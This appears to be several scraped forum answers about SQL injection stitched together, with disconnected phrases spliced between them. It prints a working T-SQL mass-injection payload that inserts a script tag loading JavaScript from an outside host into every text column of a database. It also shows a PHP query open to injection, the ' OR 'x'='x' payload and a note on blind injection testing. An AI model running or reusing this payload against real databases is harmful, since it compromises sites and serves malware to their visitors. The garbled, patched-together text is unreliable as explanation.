different attack that uses sql injection

To fix this issue Note: my first explanation was incorrect because I didn't actually read through the whole thing...
here's what that translates to. It searches your database for text or varchar columns (b.xtype in 99,35,231,167) and then injects a javascript file into all text columns in your database. A bit more malicious than I first thought.

DECLARE 
    @T varchar(255),
    @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR 
    select a.name,b.name 
    from sysobjects a,syscolumns b 
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=''">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script>
      <!--''+['+@C+'] where '+@C+' not like ''%">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
'')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

hope this fix your issue Your query appears (EDIT: appeared, in the first version of the query) to be entirely static - i.e. it doesn't use any user-supplied data. In that case, there's no risk of SQL injection.
SQL injection attacks involve taking user input and including that directly in a SQL query, instead of the preferred method of using a parameterized SQL statement and including user-supplied values that way. (I don't know the details of how that's done in PHP... I certainly hope it's possible.)

$a1="SELECT  hosteladmissionno,student_name,semester FROM registration 
WHERE mess_type ".$q."' AND  status_flag=1";

WHERE mess_type='".$q."' AND  status_flag=1";

' OR 'x'='x

SELECT hosteladmissionno,student_name,semester FROM registration 
WHERE mess_type='' OR 'x'='x' AND  status_flag=1

help you fix your problem That is Cross-site scripting

Does that help Likely yes.
A standard approach to testing for boolean-based blind SQL injection is to attempt to identify a parameter that will accept additional clauses and produce reliably different responses when the clauses evaluate to true or false.